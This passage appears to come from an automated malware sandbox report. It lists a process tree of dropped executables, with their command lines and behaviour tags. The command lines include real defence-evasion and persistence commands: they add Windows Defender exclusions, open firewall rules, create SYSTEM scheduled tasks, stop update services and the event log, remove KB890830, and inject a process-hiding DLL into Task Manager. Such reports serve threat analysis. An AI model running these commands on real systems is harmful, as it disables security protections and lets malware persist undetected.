        "C:\Users\Admin\Pictures\eh3nceepcFL8F4a9sIbYDI3p.exe"
        9⤵
        Executes dropped EXE
        
        PID:1112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6676
        
        C:\Users\Admin\Pictures\eh3nceepcFL8F4a9sIbYDI3p.exe
        
        "C:\Users\Admin\Pictures\eh3nceepcFL8F4a9sIbYDI3p.exe"
        10⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7328
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:4736
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        Modifies Windows Firewall
        
        PID:1956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7028
        
        C:\Users\Admin\Pictures\7XKobIkUf4xDjA7kpRLBYkTM.exe
        
        "C:\Users\Admin\Pictures\7XKobIkUf4xDjA7kpRLBYkTM.exe"
        9⤵
        Executes dropped EXE
        
        PID:2256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7060
        
        C:\Users\Admin\Pictures\7XKobIkUf4xDjA7kpRLBYkTM.exe
        
        "C:\Users\Admin\Pictures\7XKobIkUf4xDjA7kpRLBYkTM.exe"
        10⤵
        
        PID:8028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8040
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:5584
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        Modifies Windows Firewall
        
        PID:5156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5360
        
        C:\Users\Admin\Pictures\WrYwfd7W6pgYfjomXLgcNAj2.exe
        
        "C:\Users\Admin\Pictures\WrYwfd7W6pgYfjomXLgcNAj2.exe"
        9⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6028
        
        C:\Users\Admin\Documents\SimpleAdobe\JsEhUDjnD9mgVdDWSfeMTdfT.exe
        
        C:\Users\Admin\Documents\SimpleAdobe\JsEhUDjnD9mgVdDWSfeMTdfT.exe
        10⤵
        
        PID:7616
        
        C:\Users\Admin\Pictures\U5bwBTogwsYoizFTAQkxSglh.exe
        
        "C:\Users\Admin\Pictures\U5bwBTogwsYoizFTAQkxSglh.exe"
        9⤵
        Executes dropped EXE
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\7zSF090.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        10⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:3944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        11⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        12⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        13⤵
        
        PID:780
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        14⤵
        
        PID:6128
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        12⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        13⤵
        
        PID:1280
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        14⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        12⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        13⤵
        
        PID:4696
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        14⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        12⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        13⤵
        
        PID:6852
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        14⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        12⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        13⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7056
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        15⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        11⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3164
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        14⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 18:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF090.tmp\Install.exe\" it /rAjdidZQtj 385118 /S" /V1 /F
        11⤵
        Creates scheduled task(s)
        
        PID:3652
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        11⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        12⤵
        
        PID:4364
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        13⤵
        
        PID:3476
        
        C:\Users\Admin\Pictures\5v659Vc2Y5H6SIxTtHkWsrL0.exe
        
        "C:\Users\Admin\Pictures\5v659Vc2Y5H6SIxTtHkWsrL0.exe"
        9⤵
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\7zS224.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        10⤵
        Checks BIOS information in registry
        Enumerates system info in registry
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        11⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        12⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        13⤵
        
        PID:2232
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        14⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        12⤵
        
        PID:632
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        13⤵
        
        PID:2132
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        14⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        12⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        13⤵
        
        PID:6548
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        14⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        12⤵
        
        PID:6444
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        13⤵
        
        PID:6824
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        14⤵
        
        PID:6200
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        12⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        13⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1844
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        15⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        11⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1076
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        14⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 18:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS224.tmp\Install.exe\" it /llmdidRJNG 385118 /S" /V1 /F
        11⤵
        Creates scheduled task(s)
        
        PID:4996
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        11⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        12⤵
        
        PID:4044
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        13⤵
        
        PID:5424
        
        C:\Users\Admin\Pictures\Sl5ode7Q5jYj3EvTChAc359y.exe
        
        "C:\Users\Admin\Pictures\Sl5ode7Q5jYj3EvTChAc359y.exe"
        9⤵
        
        PID:5940
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        10⤵
        
        PID:6844
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        11⤵
        
        PID:6664
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:7048
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:5388
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:5140
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        10⤵
        Launches sc.exe
        
        PID:5916
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        10⤵
        Launches sc.exe
        
        PID:5856
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        10⤵
        
        PID:7032
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        10⤵
        
        PID:5036
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        10⤵
        
        PID:2528
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        10⤵
        
        PID:6156
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
        10⤵
        Launches sc.exe
        
        PID:2796
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
        10⤵
        Launches sc.exe
        
        PID:7012
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        10⤵
        Launches sc.exe
        
        PID:6176
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        10⤵
        Launches sc.exe
        
        PID:6516
    - - C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
        5⤵
        Executes dropped EXE
        
        PID:4336
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:512
      - C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000254001\ISetup8.exe"
        6⤵
        Executes dropped EXE
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\u1y8.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1y8.0.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\Temp\u1y8.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1y8.1.exe"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5996
        
        C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe
        
        "C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe" pgfilter
        9⤵
        
        PID:1956
        
        C:\Program Files\iolo technologies\System Mechanic\incinerator.exe
        
        "C:\Program Files\iolo technologies\System Mechanic\incinerator.exe" /regserver
        9⤵
        
        PID:5632
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=ioloTrayApp dir=in action=allow program="C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:7584
        
        C:\Program Files\iolo technologies\System Mechanic\iolo.exe
        
        "C:\Program Files\iolo technologies\System Mechanic\iolo.exe"
        9⤵
        
        PID:6340
        
        C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe
        
        "C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"
        10⤵
        
        PID:6864
        
        C:\Windows\SYSTEM32\regsvr32.exe
        
        "regsvr32" "C:\Program Files\iolo technologies\System Mechanic\Incinerator.dll" /s
        10⤵
        
        PID:7496
        
        C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe
        
        "C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"
        10⤵
        
        PID:6248
      - C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:3364
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 492
        7⤵
        Program crash
        
        PID:4060
      - C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        Executes dropped EXE
        
        PID:2128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        
        PID:6572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5188
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        8⤵
        
        PID:3396
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:6600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3300
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        8⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7912
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        9⤵
        Creates scheduled task(s)
        
        PID:6352
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        9⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        9⤵
        
        PID:7516
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        9⤵
        Creates scheduled task(s)
        
        PID:6380
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        9⤵
        
        PID:7680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        10⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        11⤵
        Launches sc.exe
        
        PID:7080
- - C:\Users\Admin\1000006002\3b9f6efab5.exe
    "C:\Users\Admin\1000006002\3b9f6efab5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4120
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:1956
  - - C:\Windows\SysWOW64\schtasks.exe
